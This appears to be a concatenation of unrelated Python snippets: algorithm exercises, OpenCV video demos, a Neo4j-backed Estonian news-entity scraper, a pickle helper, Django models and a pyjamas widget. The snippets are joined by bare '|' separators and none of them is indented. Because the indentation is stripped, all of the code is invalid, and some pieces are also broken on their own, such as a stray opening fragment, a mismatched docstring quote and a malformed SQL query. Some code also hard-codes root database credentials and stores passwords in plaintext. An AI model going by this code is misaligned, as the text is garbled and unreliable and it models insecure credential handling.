def deletable(self): return False;
|
class Solution(object):
def isAnagram(self, s, t):
"""
:type s: str
:type t: str
:rtype: bool
"""
if (s is None) != (t is None):
return False
if len(s) != len(t):
return False
hash_map = {i:0 for i in t}
for char in t:
hash_map[char] += 1
source_map = {j: 0 for j in s}
for char in s:
source_map[char] += 1
for key in hash_map:
if key not in source_map:
return False
if hash_map[key] != source_map[key]:
return False
return True |
def binarySearch(left,right,arr,searchKey,ans):
if left <= right:
mid = (left + right) // 2
if arr[mid] > searchKey:
# we save this and move to left to minimize it
ans[0] = arr[mid]
return binarySearch(left,mid-1,arr,searchKey,ans)
else:
# if char at mid is smaller than target we move to right to go to a bigger character
return binarySearch(mid+1,right,arr,searchKey,ans)
def findNext(arr,char):
searchKey = char
left = 0
right = len(arr) - 1
ans = [arr[0]]
binarySearch(left,right,arr,searchKey,ans)
return ans[0]
arr1 = ["c", "f", "j"]
char1 = "a"
arr2 = ["e","e","e","e","e","e","n","n","n","n"]
char2 = "e"
print(findNext(arr1,char1))
print(findNext(arr2,char2))
|
import cv2
import numpy as np
cam = cv2.VideoCapture(0)
while True:
ret, im =cam.read()
cv2.imshow('im',im)
if cv2.waitKey(10)==ord('q'):
break
cam.release()
cv2.destroyAllWindows() |
import numpy as np
import cv2 as cv
def text_detection_MSER(img):
## Read image and change the color space
im_shape = img.shape
if len(im_shape) == 2:
img = cv.cvtColor(img, cv.COLOR_GRAY2RGB)
gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
## Get mser, and set parameters
mser = cv.MSER_create()
# mser.setMinArea(100)
# mser.setMaxArea(750)
## Do mser detection, get the coodinates and bboxes
coordinates, bboxes = mser.detectRegions(gray)
## colors
colors = [[43, 43, 200], [43, 75, 200], [43, 106, 200], [43, 137, 200], [43, 169, 200], [43, 200, 195],
[43, 200, 163], [43, 200, 132], [43, 200, 101], [43, 200, 69], [54, 200, 43], [85, 200, 43],
[116, 200, 43], [148, 200, 43], [179, 200, 43], [200, 184, 43], [200, 153, 43], [200, 122, 43],
[200, 90, 43], [200, 59, 43], [200, 43, 64], [200, 43, 95], [200, 43, 127], [200, 43, 158],
[200, 43, 190], [174, 43, 200], [142, 43, 200], [111, 43, 200], [80, 43, 200], [43, 43, 200]]
## Fill with random colors
np.random.seed(0)
canvas1 = img.copy()
canvas3 = np.zeros_like(img)
for cnt in coordinates:
xx = cnt[:, 0]
yy = cnt[:, 1]
color = colors[np.random.choice(len(colors))]
canvas1[yy, xx] = color
canvas3[yy, xx] = color
# cv2.imshow('result',canvas3)
cv.imshow("canvas_TextRec", canvas1)
cv.imshow("canvas_tx", canvas3)
mser = cv.MSER_create()
cap = cv.VideoCapture('videos/test.mp4')
fgbg = cv.bgsegm.createBackgroundSubtractorMOG()
while(1):
ret, frame = cap.read()
gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
gray = cv.equalizeHist(gray)
text_detection_MSER(gray)
k = cv.waitKey(10) & 0xff
if k == 27:
break
cap.release()
cv.destroyAllWindows() |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os.path, json
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
from bs4 import BeautifulSoup
from estnltk import Text
from py2neo import Graph
from py2neo.ogm import GraphObject, Property, RelatedTo, RelatedFrom
from hashlib import md5
import re
import time, datetime
import logging
class Nstory(GraphObject):
__primarykey__ = "url"
url = Property()
title = Property()
category = Property()
hash = Property()
pub_day_sec = Property("pubDaySec") #int
ver = Property()
sentences = RelatedTo("Sentence", "HAS")
editors = RelatedTo("Editor", "EDITED_BY")
def __init__(self):
self.sentences_dict = {}
self.words_dict = {}
def pullLocalGraph(self, graph, pullNstory=True, resetWordCount=False):
if (pullNstory): graph.pull(self)
for sen in self.sentences:
self.sentences_dict[sen.num] = sen
for word in sen.words:
if (word.type not in self.words_dict):
self.words_dict[word.type] = {}
self.words_dict[word.type][word.text] = word
if (resetWordCount):
props = {}
props['count'] = 0
sen.words.update(word, props)
def pushLocalGraph(self, graph):
for sen in self.sentences_dict.values():
if (sen not in self.sentences):
self.sentences.add(sen)
logging.info("Pushing sentence: %d with %d words. " % (sen.num, len(sen.words) ) )
graph.push(sen)
logging.info("Pushing nstory")
graph.push(self)
if ( len(self.sentences) != len(self.sentences_dict) ):
raise AssertionError('Sentence counts dont match for url: %s' % (self.url) )
def attachTimetree(self, graph, pub_date_time, pub_timezone):
if ( pub_date_time.find(' ') > 0 ):
prev_date = self.getPubDate(graph)
pub_date = pub_date_time.split(' ')[0]
if (prev_date):
if (prev_date < pub_date):
graph.run(
"MATCH (ns:Nstory {url: {inUrl}})-[rel]->(:Day) "
"WITH rel LIMIT 1 "
"DELETE rel ",
{'inUrl': self.url}
)
elif(prev_date > pub_date):
raise AssertionError("Previous pub_date is bigger than new pub_date, url %s" % (self.url))
return
pub_timestamp = int(time.mktime(datetime.datetime.strptime(pub_date_time, "%Y-%m-%d %H:%M:%S").timetuple()))*1000
graph.run(
"MATCH (ns:Nstory {url: {inUrl}}) "
"CALL ga.timetree.events.attach({node: ns, time: {inTimestamp}, timezone: '{inTz}', relationshipType: 'PUBLISHED_ON'}) "
"YIELD node RETURN node ",
{'inUrl': self.url, 'inTimestamp': pub_timestamp, 'inTz': pub_timezone}
)
def getPubDate(self, graph):
results = graph.data(
"MATCH (n:Nstory {url: {inUrl} })-->(d:Day)<--(m:Month)<--(y:Year) "
"RETURN d.value, m.value, y.value "
"LIMIT 1 "
, {'inUrl': self.url}
)
if (len(results) > 0):
date_str = "%d-%02d-%02d" % (results[0]['y.value'], results[0]['m.value'], results[0]['d.value'])
return date_str
else:
return None
def insertSentence(self, graph, sentence_num):
if (not sentence_num in self.sentences_dict):
new_sentence = Sentence()
new_sentence.num = sentence_num
##ogm class can't create temp id-s, with merge it gets internal ID from db
graph.merge(new_sentence)
self.sentences_dict[sentence_num] = new_sentence
return new_sentence
return None
def insertWord(self, graph, sen_num, w_text, w_type, w_orig_text):
created_newword = False
if (sen_num in self.sentences_dict):
sentence = self.sentences_dict[sen_num]
if (w_type in self.words_dict and w_text in self.words_dict[w_type]):
word = self.words_dict[w_type][w_text]
else:
word = LocalWord()
if (w_type not in self.words_dict):
self.words_dict[w_type] = {}
self.words_dict[w_type][w_text] = word
created_newword = True
word.text = w_text
word.type = w_type
if (w_text.find('|') > 0):
word.origtext = w_orig_text
if (created_newword):
##ogm class can't create temp id-s, with merge it gets internal ID from db
graph.merge(word)
props = {}
props['count'] = sentence.words.get(word, 'count',0) + 1
logging.info("sen: %d -> %s|%s" % (sen_num, word.text, word.type))
sentence.words.update(word, props)
return word
else:
raise ValueError('Sentence object doesnt exist.')
return None
class Sentence(GraphObject):
num = Property("numInNstory") #int
in_nstories = RelatedFrom("Nstory", "HAS")
words = RelatedTo("LocalWord", "HAS")
class LocalWord(GraphObject):
text = Property()
type = Property() #values: 'LOC', 'ORG', 'PER'
origtext = Property()
in_sentences = RelatedFrom("Sentence", "HAS")
terms = RelatedTo("Term", "IS")
class Term(GraphObject):
__primarykey__ = "id"
text = Property()
type = Property() #values: 'LOC', 'ORG', 'PER'
fuzzy = Property() #values: "true"
incoming = Property() #int
in_words = RelatedFrom("LocalWord", "IS")
class Editor(GraphObject):
__primarykey__ = "name"
name = Property()
in_nstories = RelatedFrom("Nstory", "EDITED_BY")
class UudisKratt():
VERSION = "4"
MAX_TEXT_LEN = 110000
MAX_FIELD_LEN = 150
LOCK_FILE = "graph-err.lock"
def __init__(self):
self.throttle_delay = 8 # sec
self.last_request_time = None
homedir = os.path.expanduser('~')
confFile = os.path.join(homedir, '.graph-err.cnf')
with open(confFile) as json_data_file:
my_conf = json.load(json_data_file)
self.graph = Graph(user=my_conf['neo4j']['user'], password=my_conf['neo4j']['password'])
def fetchArticle(self, article_url):
out_text = ''
if (article_url):
current_time = time.time()
if (self.last_request_time and
(current_time - self.last_request_time < self.throttle_delay)):
throttle_time = (self.throttle_delay -
(current_time - self.last_request_time))
logging.info("sleeping for %f seconds" % (throttle_time))
time.sleep(throttle_time)
self.last_request_time = time.time()
req = Request(article_url)
try:
response = urlopen(req)
except HTTPError as e:
self.setErrorNstory(article_url)
logging.error('HTTPError: %d, setting ErrorNstory' % (e.code) )
except URLError as e:
logging.error('URLError: %s' % (e.reason) )
else:
req_url = response.geturl()
if (req_url != article_url):
self.updateNstoryUrl(article_url, req_url)
article_url = req_url
nstory = Nstory()
nstory.url = article_url
html_data = response.read()
soup = BeautifulSoup(html_data, "lxml")
cat_match = soup.find("meta", property="article:section")
if (cat_match):
nstory.category = cat_match["content"][:UudisKratt.MAX_FIELD_LEN]
nstory.ver = UudisKratt.VERSION
pub_date = ''
pub_timezone = ''
##<meta property="article:modified_time" content="2016-12-14T10:49:25+02:00" />
mod_date = soup.find("meta", property="article:modified_time")
if (mod_date):
match_date = re.search("^(\d+-\d+-\d+)T(\d+:\d+:\d+)\+(\d+:\d+)", mod_date["content"])
if match_date:
nstory.pub_day_sec = self.getSec(match_date.group(2))
pub_date = "%s %s" % (match_date.group(1), match_date.group(2))
pub_timezone = "GMT+%s" % (match_date.group(3) )
#title
m_title = soup.find("meta", property="og:title")
if (m_title):
nstory.title = m_title["content"][:UudisKratt.MAX_FIELD_LEN]
art_text = soup.find("article")
if (art_text and pub_date and pub_timezone):
for html_break in art_text.find_all('br'):
html_break.replace_with('; ')
for row in art_text.find_all("p", {'class': None}):
row_text = row.get_text(separator=u' ')
out_text = "%s %s" % (out_text, row_text)
logging.info("Updating Nstory: %s" % (article_url) )
self.graph.merge(nstory)
nstory.attachTimetree(self.graph, pub_date, pub_timezone)
editor_txt = art_text.find("p", {'class': 'editor'})
if (editor_txt):
editor_txt = editor_txt.find("span", {'class': 'name'})
if (len(editor_txt) > 0):
for editor_str in editor_txt.text.split(','):
editor = Editor()
editor.name = editor_str.strip()[:UudisKratt.MAX_FIELD_LEN]
nstory.editors.add(editor)
retval = self.analyzeText(out_text, nstory)
return retval
else:
logging.error("Malformed content at url, setting as ErrorNstory: %s" % (article_url))
self.setErrorNstory(article_url)
return False
def texthash(self, text):
return md5(text.encode('utf-8')).hexdigest()
def getSec(self, time_str):
h, m, s = time_str.split(':')
return int(h) * 3600 + int(m) * 60 + int(s)
def analyzeText(self, in_text, nstory):
if (len(in_text) < UudisKratt.MAX_TEXT_LEN ):
pullNstory = False
resetWordCount = True
nstory.pullLocalGraph(self.graph, pullNstory, resetWordCount)
text = Text(in_text)
sentence_count = 0
count = 0
prev_sen_num = -1
logging.info("%s named entities: %d " % (nstory.url, len(text.named_entities) ) )
for named_entity in text.named_entities:
ne_words = named_entity.split()
orig_words = text.named_entity_texts[count].split()
orig_text = text.named_entity_texts[count]
word_count = 0
out_entity = u''
for ne_word in ne_words:
if (word_count > len(orig_words)-1 ):
break
if (word_count):
out_entity = "%s " % (out_entity)
#last word
if (word_count == (len( ne_words )-1) ):
new_word = ne_word
if ( orig_words[word_count].isupper() ):
new_word = new_word.upper()
elif ( len(orig_words[word_count])>1 and orig_words[word_count][1].isupper() ):
new_word = new_word.upper()
elif ( orig_words[word_count][0].isupper() ):
new_word = new_word.title()
#Jevgeni Ossinovsk|Ossinovski
if (out_entity and new_word.find('|') > 0 ):
word_start = out_entity
out_ent2 = ''
for word_part in new_word.split('|'):
if (out_ent2):
out_ent2 = "%s|" % (out_ent2)
out_ent2 = "%s%s%s" % (out_ent2, word_start, word_part)
out_entity = out_ent2
else:
out_entity = "%s%s" % (out_entity, new_word)
else:
out_entity = "%s%s" % (out_entity, orig_words[word_count])
word_count += 1
ne_endpos = text.named_entity_spans[count][1]
while (ne_endpos > text.sentence_ends[sentence_count]):
sentence_count += 1
## Rupert Colville'i
## Birsbane’is
if ( out_entity.find("'") > 0 or out_entity.find("’") > 0 ):
out_entity = re.sub(u"^(.+?)[\'\’]\w{1,2}$", u"\\1", out_entity)
w_type = text.named_entity_labels[count]
if (sentence_count != prev_sen_num):
nstory.insertSentence(self.graph, sentence_count)
prev_sen_num = sentence_count
nstory.insertWord(self.graph, sentence_count, out_entity, w_type, orig_text)
count += 1
nstory.hash = self.texthash(in_text)
nstory.pushLocalGraph(self.graph)
return True
else:
logging.error("text size exceeds limit! url: %s" % (article_url) )
return False
def getNstory(self, url):
return Nstory.select(self.graph, url).first()
def genTerms(self, url):
added_terms = set()
results = self.graph.data(
"MATCH (nstory:Nstory {url: {inUrl} })--(sentence:Sentence)--(word:LocalWord) "
"RETURN DISTINCT word.text as text, word.type as type, id(word) as id "
"ORDER BY type "
, {'inUrl': url}
)
persons = []
for wordDict in results:
if (wordDict['type'] == 'LOC' or wordDict['type'] == 'ORG'):
added_terms.add( self.insertTerm(wordDict['text'], wordDict['type'], wordDict['id']) )
elif (wordDict['type'] == 'PER'):
if (wordDict['text'].find(' ') > 0):
wordDict['surname'] = wordDict['text'].split(' ')[-1]
else:
wordDict['surname'] = ''
persons.append(wordDict)
else:
logging.error("unknown LocalWord type: %s, word id(): %d " % (wordDict['type'], wordDict['id']))
for person in persons:
if (person['text'].find(' ') > 0):
if (person['text'].find('|') > 0):
useName = person['text']
for fullname in person['text'].split('|'):
match = next((item for item in persons if item["text"] == fullname), None)
if (match) :
useName = fullname
person['surname'] = fullname.split(' ')[-1]
break
added_terms.add( self.insertTerm(useName, person['type'], person['id']) )
else:
added_terms.add( self.insertTerm(person['text'], person['type'], person['id']) )
else:
#lookup if short name is surname
if (person['text'].find('|') > 0):
useName = person['text']
for name in person['text'].split('|'):
match = next((item for item in persons if item["surname"] == name), None)
if (match) :
useName = match['text']
break
added_terms.add( self.insertTerm(useName, person['type'], person['id']) )
else:
useName = person['text']
match = next((item for item in persons if item["surname"] == person['text']), None)
if (match) :
useName = match['text']
added_terms.add( self.insertTerm(useName, person['type'], person['id']) )
return added_terms
def checkForLocalWords(self, url):
newsNode = self.graph.find_one('Nstory', property_key='url', property_value=url)
sen_count = 0
for rel in self.graph.match(start_node=newsNode, rel_type="HAS"):
sentence = rel.end_node()
sen_count += 1
sWordRels = self.graph.match(start_node=sentence, rel_type="HAS")
if (next(sWordRels, None) == None):
logging.info("dead end sentence [%d] for url: %s ...fetching article" % (sentence['numInNstory'], url))
self.delDeadEndSentences(url)
self.fetchArticle(url)
return
if (sen_count == 0):
logging.info("no sentences for url: %s ...fetching article" % (url, ))
self.fetchArticle(url)
return
def insertTerm(self, w_text, w_type, w_id):
term_id = None
if (w_text.find('|') > 0):
if (w_type == 'PER'):
if (w_text.find(' ') > 0):
term_id = self.getTermByWord(w_text, w_type)
else:
term_id = self.getTermByWord(w_text, w_type)
if (not term_id):
term_id = "%s|%s" % (w_text, w_type)
if (w_text.find('|') > 0):
self.graph.run(
"MERGE (term:Term {id: {termId}}) "
"ON CREATE SET term.text = {wText}, term.type = {wType}, term.incoming = 0, term.fuzzy = 'true' "
"WITH term "
"MATCH (word:LocalWord) "
"WHERE id(word) = {wId} "
"MERGE (word)-[:IS]->(term) "
, {'termId': term_id, 'wText': w_text, 'wType': w_type, 'wId': w_id}
)
else:
self.graph.run(
"MERGE (term:Term {id: {termId}}) "
"ON CREATE SET term.text = {wText}, term.type = {wType}, term.incoming = 0 "
"WITH term "
"MATCH (word:LocalWord) "
"WHERE id(word) = {wId} "
"MERGE (word)-[:IS]->(term) "
, {'termId': term_id, 'wText': w_text, 'wType': w_type, 'wId': w_id}
)
return term_id
def updateNstoryUrl(self, old_url, new_url):
if (self.getNstory(new_url)):
logging.info("Deleting duplicate Nstory with url %s " % (old_url) )
dupeNstory = self.getNstory(old_url)
if (dupeNstory):
self.graph.delete(dupeNstory)
return new_url
logging.info("url %s redirected, updating news node" % (old_url) )
results = self.graph.data(
"MATCH (n:Nstory {url: {oldUrl} }) "
"SET n.url = {newUrl} "
"RETURN n.url "
"LIMIT 1 "
, {'oldUrl': old_url, 'newUrl': new_url}
)
if (len(results) > 0):
return results[0]['n.url']
return None
def setErrorNstory(self, url):
results = self.graph.run(
"MATCH (n:Nstory {url: {inUrl} }) "
"REMOVE n:Nstory "
"SET n:ErrorNstory "
, {'inUrl': url}
)
def delDeadEndSentences(self, url):
results = self.graph.data(
"MATCH (n:Nstory {url: {inUrl} })-->(s:Sentence) "
"WHERE NOT (s)-->(:LocalWord) "
"WITH DISTINCT s LIMIT 50 "
"DETACH DELETE(s) "
"RETURN count(*) as del_count "
, {'inUrl': url}
)
if (len(results) > 0):
return results[0]['del_count']
else:
return None
def getTermByWord(self, w_text, w_type):
results = self.graph.data(
"MATCH (word:LocalWord {text: {wText}, type: {wType} })--(term:Term) "
"RETURN term.id "
"LIMIT 1 "
, {'wText': w_text, 'wType': w_type}
)
if (len(results) > 0):
return results[0]['term.id']
else:
return None
def mergeTermInto(self, firstTerm, targetTerm):
if( len(firstTerm)>0 and len(targetTerm)>0 ):
res_cursor = self.graph.run(
"MATCH (first:Term {id: {firstId} })--(w:LocalWord) "
"MATCH (target:Term {id: {targetId} }) "
"MERGE (w)-[:IS]->(target) "
"RETURN w.text "
, {'firstId': firstTerm, 'targetId': targetTerm}
)
if res_cursor.forward():
del_cursor = self.graph.run(
"MATCH (first:Term {id: {firstId} }) "
"DETACH DELETE(first) "
, {'firstId': firstTerm}
)
results = self.graph.run(
"MATCH (t:Term {id: {targetId} })-[r]-(:LocalWord) "
"WITH t, count(r) AS in_count "
"SET t.incoming = in_count "
, {'targetId': targetTerm}
)
return True
return False
###########UudisKratt.py
|
"""
saving to and reading from pickle files
"""
from __future__ import annotations
from typing import Union, Dict, IO
try: # drop:py37 (backport)
from importlib.metadata import version
except ModuleNotFoundError:
from importlib_metadata import version
import pickle
def write_dict_pkl(fhandle: Union[str, IO], dictionary: Dict) -> None:
""" writes a nested dictionary containing strings & arrays as data into
a pickle file
Args:
file: a filename or opened writable file
dictionary(dict): the dict to be saved
"""
if isinstance(fhandle, str):
fhandle = open(fhandle, 'wb')
dictionary['rsatoolbox_version'] = version('rsatoolbox')
pickle.dump(dictionary, fhandle, protocol=-1)
def read_dict_pkl(fhandle: Union[str, IO]) -> Dict:
""" writes a nested dictionary containing strings & arrays as data into
a pickle file
Args:
file: a filename or opened readable file
Returns:
dictionary(dict): the loaded dict
"""
if isinstance(fhandle, str):
fhandle = open(fhandle, 'rb')
data = pickle.load(fhandle)
return data
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.home_page, name='clubs_home_page'),
url(r'^(?P<slug>[-\w\d]+)/$', views.club_page, name='club_page'),
]
|
# package com.gwittit.client.example
import java
from java import *
from java.util.List import List
from pyjamas.ui import GWT
from com.google.gwt.event.dom.client.ClickEvent import ClickEvent
from com.google.gwt.event.dom.client.ClickHandler import ClickHandler
from pyjamas.rpc import AsyncCallback
from pyjamas.ui import Button
from pyjamas.ui import Composite
from pyjamas.ui import HTML
from pyjamas.ui import HorizontalPanel
from pyjamas.ui import Image
from pyjamas.ui import ListBox
from gwittit.client.facebook import ApiFactory
from gwittit.client.facebook import FacebookApi
from gwittit.client.facebook.entities import EventInfo
class EventSelector(Composite):
"""
Let user select an event
"""
@java.init
def __init__(self, *a, **kw):
self.outer = HorizontalPanel()
self.apiClient = ApiFactory.getInstance()
self.selectButton = Button(u" Go ")
self.selectHandler = None
self.loader = Image(u"/loader.gif")
@java.interface
class EventSelectorHandler(java.Interface):
def onSelect(self, eid):
pass
@__init__.register
@java.typed()
def __init__(self, ):
self.__init__._super()
"""
New instance
"""
self.outer.setSpacing(10)
self.outer.add(HTML(u"Select Event: "))
self.outer.add(self.loader)
class _anonymous(AsyncCallback):
@java.typed(Throwable)
def onFailure(self, caught):
self.outer.add(HTML(u"Failed get events..."))
@java.typed(List)
def onSuccess(self, result):
self.outer.remove(self.loader)
dropBox = ListBox(False)
for e in result:
GWT.log(u"adding " + java.str(e.getName()), None)
dropBox.addItem(e.getName(), e.getEidString())
self.outer.add(dropBox)
self.outer.add(self.selectButton)
class _anonymous(ClickHandler):
@java.typed(ClickEvent)
def onClick(self, event):
self.selectHandler.onSelect(Long(dropBox.getValue(dropBox.getSelectedIndex())))
self.selectButton.addClickHandler(_anonymous())
self.apiClient.eventsGet(None, _anonymous())
self.initWidget(self.outer)
@java.typed(EventSelectorHandler)
def addSelectHandler(self, handler):
self.selectHandler = handler
|
import F00,F01
def topup():
Jumlah = F00.banyakParam(F01.dataUser)
kolomUsername = 3
kolomSaldo = 6
tmpDataTopUp = F00.sliceArray(F01.dataUser,2,Jumlah)
username = input("Masukkan username: ")
topup = input("Masukkan saldo yang di-top up: ")
for idxDataUser in range(0,Jumlah-1):
saldo = tmpDataTopUp[idxDataUser][kolomSaldo]
if (username == tmpDataTopUp[idxDataUser][kolomUsername]):
total = int(saldo) + int(topup)
tmpDataTopUp[idxDataUser][kolomSaldo] = str(total)
print("Top up berhasil. Saldo "+username+" bertambah menjadi", total)
|
#!/usr/bin/env python3
import sys
import os
sys.path.append(os.getcwd())
# run.py - file to actually run
from GeometricModel import GeometricModel
from StraightWireModel import StraightWireModel
from PinkNoiseModel import PinkNoiseModel
from Electrode import Electrode
from helpers import *
import networkx as nx
from random import sample
import matplotlib.pyplot as plt
# model parameters
r_e = 0.4 # electrode radius
alpha = 1 # distance between electrode centers
density = 30 # wire density constant
# specific for pink noise model
numPointsPerWire = 201 # from paper
# sweep parameters for the square root of the number of electrodes
num_e_min = 3
num_e_max = 40
# initialize array for small world coefficient parameters
sigma_array = []
#"""
# begin sweep of square root of electrode count:
for root_num_e in range(num_e_min, num_e_max + 1):
print("working on root_num_e = ", root_num_e)
# initialize geometric model
model = PinkNoiseModel(density, r_e, alpha, root_num_e ** 2, numPointsPerWire, spacing=False)
# plot geometric model
model.plotModel()
# generate equivalent bipartite graph
[equivalentGraph, e_nodes] = model.generateEquivalentBipartiteGraph()
# generate random bipartite graph with the same node and edge counts
[randomGraph, rand_e_nodes] = generateRandomBipartiteGraph(model.num_e,
model.numValidWires, model.numValidEdges)
# get average shortest path length and square clustering coefficient for both graphs
[L, C] = analyzeBipartiteGraph(equivalentGraph, e_nodes)
[L_r, C_r] = analyzeBipartiteGraph(randomGraph, rand_e_nodes)
# compute small world coefficient
sigma_array.append(computeSmallWorldCoefficient(L, C, L_r, C_r))
# plot small world coefficient versus square root of electrode count
plotSmallWorldSweep(sigma_array, range(num_e_min, num_e_max + 1))
#"""
"""
# create large network first
model = PinkNoiseModel(density, r_e, alpha, 16 ** 2, numPointsPerWire, spacing=True)
# plot model
model.plotModel()
# generate equivalent bipartite graph
equivalentGraph = model.generateGraph()
#nx.draw(equivalentGraph)
#plt.show()
# sweep chemical distance and store N(r) in a vector
r_vec = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
N_vec = []
random_nodes = sample(list(equivalentGraph.nodes()), len(r_vec))
for i in range(len(r_vec)):
r = r_vec[i]
seed = random_nodes[i]
ego_net = nx.ego_graph(equivalentGraph, seed, radius=r)
N_vec.append(len(ego_net.nodes()))
print("for r = ", r_vec[i], ": N(r) = ", N_vec[i])
print(r_vec)
print(N_vec)
plt.loglog(r_vec, N_vec)
plt.xlabel('r')
plt.ylabel('N(r)')
plt.savefig('N_vs_r_plot.png')
'''
|
import pymysql
conn = pymysql.connect(host='localhost',user='root',password='root',db='bank')
a = conn.cursor()
sql = " SELECT * from 'customer'"
a.execute(sql)
countrow = a.execute(sql)
print ("number of row",countrow)
data = a.fetchone()
print(data)
|
""" testapp2 app configs """
from django.apps import AppConfig
class Testapp2Config(AppConfig):
name = 'testapp2'
|
import cv2
import numpy as np
import os
from argparse import ArgumentParser
from os.path import join
def get_canny_bounds(frame,
color=[36,255,12]):
"""
Возвращает изображение с границами Кённи
:param frame: путь к изображению
:param color: цвет границ
:return: массив с изображением и границами
"""
frame = cv2.imread(frame)
frame_canny = cv2.Canny(frame, 50, 150)
out_frame = []
for num1, i in enumerate(frame_canny):
row = []
for num2, j in enumerate(i):
if j == 255:
row.append(color)
else:
row.append(list(frame[num1, num2]))
out_frame.append(row)
return np.array(out_frame) / 255.
parser = ArgumentParser()
parser.add_argument("--video_name",
default="F5_1_2_1.ts",
required=False)
parser.add_argument("--frames_dir",
default="/Users/artemsenin/nornickel_hack/all_frames",
required=False)
if __name__ == "__main__":
args = parser.parse_args()
all_frames = os.listdir(args.frames_dir)
video_frames = [frame for frame in all_frames
if args.video_name in frame]
n_frames = len(video_frames)
for i in range(n_frames):
frame_path = join(args.frames_dir, f"{args.video_name}_f_{i}.jpg")
canny_bounds = get_canny_bounds(frame_path)
cv2.imshow('canny_bounds', canny_bounds)
cv2.waitKey(1)
|
def two_oldest_ages(ages):
arr1 = sorted(ages)[len(ages)-1]
arr2 = sorted(ages)[len(ages)-2]
return [arr2, arr1]
def two_oldest_ages_up(ages):
return sorted(ages)[-2:]
def two_oldest_ages_up2(ages):
ages.sort()
s = [ages[-2], ages[-1]]
return s
print(two_oldest_ages([1, 5, 87, 45, 8, 8]))
print(two_oldest_ages_up([1, 5, 87, 45, 8, 8]))
print(two_oldest_ages_up2([1, 5, 87, 45, 8, 8])) |
class Node:
def __init__(self,data):
self.data = data
self.next= None
class LinkedList:
def __init__(self):
self.head = None
def push(self,new_data):
t = Node(new_data)
t.data = new_data
t.next = self.head
self.head = t
def printList(self):
temp = self.head
while temp:
print(temp.data,end=" ")
temp = temp.next
def DetectLoop(self):
s =set()
count = 0
temp = self.head
while temp:
if temp in s:
return count
s.add(temp)
temp = temp.next
count= count+1
return 0
llist = LinkedList()
llist.push(20)
llist.push(4)
llist.push(15)
llist.push(10)
llist.head.next.next = llist.head;
t = llist.DetectLoop()
if t >0 :
print (t)
else:
print ("No Loop ")
|
from django.contrib.auth.models import User
from django.db import models
from django.db.models.signals import post_save
from phonenumber_field.modelfields import PhoneNumberField
from project_admin.models import development_methodology, Development_Tool
class ProjectDetail(models.Model):
profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
title = models.CharField(max_length=100)
company_name = models.CharField(max_length=100)
company_email = models.EmailField(max_length=100, unique=True)
company_phone = PhoneNumberField(null=False, blank=False, unique=True)
company_address = models.TextField(max_length=200)
start_date = models.DateField(auto_now=False, auto_now_add=False)
completion_date = models.DateField(auto_now=False, auto_now_add=False)
project_summary = models.TextField(max_length=1000)
project_goal = models.TextField(max_length=1000)
project_impact = models.TextField(max_length=1000)
project_requirement = models.TextField(max_length=1000)
development_methodology = models.ForeignKey(development_methodology, on_delete=models.CASCADE)
created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.title
class ProjectDevelopmentTool(models.Model):
profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
fronted = models.CharField(max_length=100)
backend = models.CharField(max_length=100)
database = models.CharField(max_length=100)
server_side = models.CharField(max_length=100)
repository = models.CharField(max_length=100)
created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.project_name.title
class ProjectTeamMember(models.Model):
profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
designation = models.CharField(max_length=100)
member_name = models.CharField(max_length=100)
created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.project_name.title
class ProjectFeaturePayment(models.Model):
profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
feature = models.JSONField(default=None)
created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.project_name.title
class ProjectMonthlyPayment(models.Model):
profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
monthly = models.JSONField(default=None)
created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.project_name.title
class ProjectServiceCharge(models.Model):
profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
service = models.FloatField()
total = models.FloatField(blank=True, null=True)
created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.project_name.title
class ClientProfile(models.Model):
client_name = models.CharField(max_length=100)
profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
email = models.EmailField(max_length=100, unique=True, blank=True)
password = models.CharField(max_length=100)
client_phone = PhoneNumberField(blank=True, unique=True, max_length=14)
created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.client_name
class ToDoList(models.Model):
project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
todo = models.TextField(max_length=300)
created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.user.username
class Timeline_User(models.Model):
project_name = models.CharField(max_length=50)
profile_name = models.CharField(max_length=50)
start_date = models.DateField(blank=True, auto_now=False, auto_now_add=False, null=True)
completion_date = models.DateField(blank=True, auto_now=False, auto_now_add=False, null=True)
update_completion_date = models.DateField(blank=True, auto_now=False, auto_now_add=False, null=True)
created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.project_name
def save_timeline_by_user_update(sender, instance, created, **kwargs):
if created:
Timeline_User.objects.create(
project_name=instance.title,
profile_name=instance.profile_name,
start_date=instance.start_date,
completion_date=instance.completion_date,
)
else:
time = Timeline_User.objects.get(project_name=instance.title, profile_name=instance.profile_name)
com = time.completion_date
Timeline_User.objects.create(
project_name=instance.title,
profile_name=instance.profile_name,
start_date=instance.start_date,
completion_date=com,
update_completion_date=instance.completion_date,
)
post_save.connect(save_timeline_by_user_update, sender=ProjectDetail)
